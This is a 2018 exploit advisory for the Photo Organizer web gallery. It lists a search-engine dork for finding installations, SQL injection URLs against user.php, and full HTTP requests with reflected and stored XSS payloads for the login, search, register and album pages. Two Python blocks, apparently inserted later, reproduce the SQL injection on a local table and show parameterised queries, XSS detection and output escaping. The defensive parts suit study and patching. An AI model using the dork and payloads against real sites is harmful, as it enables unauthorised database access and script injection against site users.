
Powered Photo Organizer XSS and SQL Vulnerabilities

Author: Rednofozi, Published: 15-10-2018
|--------------------------------------------------------------|
|[+] Exploit Title: Powered Photo Organizer XSS and SQL Vulnerabilities
|[+] Date: 13/10/2018
|[+] Exploit Author: Rednofozi
|[+] Tested on: Windows 10, Parrot OS
|[+] Vendor Homepage: http://po.shaftnet.org/
|[+] Dork: intext:"Powered by Photo Organizer"
|[+] MY page: https://cxsecurity.com/author/Inj3ct0r
|[+] MY page: http://www.exploit4arab.org/author/308/Rednofozi
|[+] Software Link: http://po.shaftnet.org/#download
|[+] ME: Rednfozi@yahoo.com
|[+] ME: Rednofozi@hotmail.com
|[+] ME: inj3ct0r@tuta.io
|[+] fb.me: https://www.facebook.com/saeid.hat.3
|--------------------------------------------------------------|

|[+] RHG hackers iran team

***************************************************************

0x01# ~ Introduction

====================

At its most basic level, Photo Organizer is (yet another) multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical "I need to share some images on the web and blog about it" crowd. It does not assume that just because you have an image, you want to share it with someone. It combines "we'd like to show people some photos" with "we have a lot of photos we just store and annotate."

To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository.



0x02# ~ Exploitation

====================



1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

0 [+] Boolean-based & Blind SQL Injection [+] 0

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1



http://site.com/user.php?user=1 and 1=2

http://site.com/user.php?user=1 union select 1,2--

http://site.com/user.php?user=-1 OR 17-7=10
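The three `user=` values above differ only in the truth value they force on the WHERE clause: `and 1=2` empties the result, `OR 17-7=10` returns every row, and the UNION appends attacker-chosen columns. The following is an added example, not code from the advisory or from Photo Organizer itself: it reproduces that behaviour against a constructed SQLite table and places the hardened lookup beside it. The table layout and the `lookup_*` / `compare` names are assumptions.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the user table behind user.php?user=<id>."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn

def lookup_vulnerable(conn, user_param):
    """Assumed shape of the flaw: the raw query-string value is spliced into the SQL
    text, so 'and 1=2' empties the result set and 'OR 17-7=10' returns every row."""
    sql = f"SELECT id, username FROM users WHERE id = {user_param}"
    return conn.execute(sql).fetchall()

def lookup_fixed(conn, user_param):
    """Hardened lookup: reject anything that is not an integer, then bind the value
    so the database never parses request-controlled text as SQL."""
    if not user_param.strip().isdigit():
        raise ValueError("user must be a non-negative integer")
    return conn.execute("SELECT id, username FROM users WHERE id = ?",
                        (int(user_param),)).fetchall()

def compare(user_param):
    """Run one user= value through both lookups; returns (vulnerable_rows, fixed_result)."""
    conn = make_db()
    try:
        vuln = lookup_vulnerable(conn, user_param)
    except sqlite3.Error as exc:
        vuln = f"sql error: {exc}"
    try:
        fixed = lookup_fixed(conn, user_param)
    except ValueError as exc:
        fixed = f"rejected: {exc}"
    return vuln, fixed

if __name__ == "__main__":
    for p in ("1", "1 and 1=2", "1 union select 1,2--", "-1 OR 17-7=10"):
        print(repr(p), "->", compare(p))
```

With the hardened lookup every non-numeric value is rejected before it reaches the database, which is also the signal a WAF or application log should alert on for this parameter.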



1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

0 [+] Reflected Cross Site Scripting (XSS) [+] 0

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1



Affected path(s): login.php

search.text.general.php

login.php?operation=get_email

register.php



========================== HTTP REQUEST XSS 1 ==============================

Host: site.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Referer: http://site.com/login.php

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 113

POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0



XSS Proof Image: http://i.imgur.com/VmbmuiZ.png

============================================================================





========================== HTTP REQUEST XSS 2 ==============================

Host: site.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Referer: http://site.com/search.text.general.php

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 109

POST: search_string='"><script>alert('1337')</script>&search_type=&current_user=all&x=0&y=0



XSS Proof Image: http://i.imgur.com/PDcO50Y.png

============================================================================





========================== HTTP REQUEST XSS 3 ==============================

Host: site.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Referer: http://site.com/login.php?operation=get_email

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 91

POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0



XSS Proof Image: http://i.imgur.com/MFc5unu.png

============================================================================





========================== HTTP REQUEST XSS 4 ==============================

Host: site.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Referer: http://site.com/register.php

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 207

POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0



XSS Proof Image: http://i.imgur.com/7T4WZMW.png

============================================================================





1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

0 [+] Persistent Cross Site Scripting (XSS) [+] 0

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1



Affected path(s): album.add.php?parent=



========================== HTTP REQUEST XSS 5 ==============================

Host: site.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Referer: http://site.com/album.add.php?parent=

Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 132

POST: album_caption='"><script>alert('sss')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0



XSS Proof Image: http://i.imgur.com/TrzBqXJ.png
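All five requests in the reflected and persistent sections above share one pattern: a form field that should hold a username, e-mail address, search string or caption instead carries HTML markup, which the application echoes without escaping. The following is an added example, not code from the advisory or from Photo Organizer: it decodes the quoted POST bodies (constructed here as sample data), flags the fields carrying markup, and shows the output-escaping fix that makes the same values inert. The `scan_body`, `flagged_fields` and `render_safely` names are assumptions.

```python
import html
import re
from urllib.parse import parse_qsl

# Constructed sample data: the POST bodies quoted in the advisory, keyed by the
# affected script (login.php appears twice, for two different operations).
SAMPLE_REQUESTS = {
    "login.php": "operation=login&username='\"><img+src=x+onerror=prompt(1337);>"
                 "&password=&auto_login=on&x=0&y=0",
    "search.text.general.php": "search_string='\"><script>alert('1337')</script>"
                               "&search_type=&current_user=all&x=0&y=0",
    "login.php?operation=get_email": "operation=send_info&email='\"><script>alert('1337')"
                                     "</script>&x=0&y=0",
    "register.php": "username='\"><img+src=x+onerror=prompt(1337);>&password_1=&password_2="
                    "&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2="
                    "&city=&zipcode=&state=null&country=null&x=0&y=0",
    "album.add.php": "album_caption='\"><script>alert('sss')</script>&parent=null"
                     "&album_access_rights=3&album_description=&x=0&y=0",
}

# Markup that has no business in a username, e-mail address, search string or
# caption: an HTML tag, an inline event handler, or a javascript: URL.
MARKUP = re.compile(r"<\s*/?[a-z][^>]*>|\bon[a-z]+\s*=|javascript:", re.I)

def scan_body(body):
    """Decode a form body and return [(field, matched_fragment)] for suspicious fields."""
    findings = []
    for field, value in parse_qsl(body, keep_blank_values=True):
        m = MARKUP.search(value)
        if m:
            findings.append((field, m.group(0)))
    return findings

def flagged_fields(requests=SAMPLE_REQUESTS):
    """Map each script to the list of field names that carried markup."""
    return {script: [f for f, _ in scan_body(body)] for script, body in requests.items()}

def render_safely(value):
    """Server-side fix: escape on output so the value is inert both as HTML text and
    inside a double- or single-quoted attribute (html.escape covers <, >, &, " and ')."""
    return html.escape(value, quote=True)

def escaped_is_inert(value):
    """True when the escaped form can no longer close a tag or a quoted attribute."""
    return not any(c in render_safely(value) for c in "<>\"'")

if __name__ == "__main__":
    for script, fields in flagged_fields().items():
        print(f"{script}: markup in {fields}")
```

The detection side doubles as a log-review filter for stored values such as `album_caption`, which is where the persistent variant lives: a caption that trips `MARKUP` in the database is a sign the application accepted and will replay the payload.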

****************************************************************

Discovered by: Rednofozi RGH team hackers

Thanks To: ReZa CLONER, Moeein Seven, Rednofozi
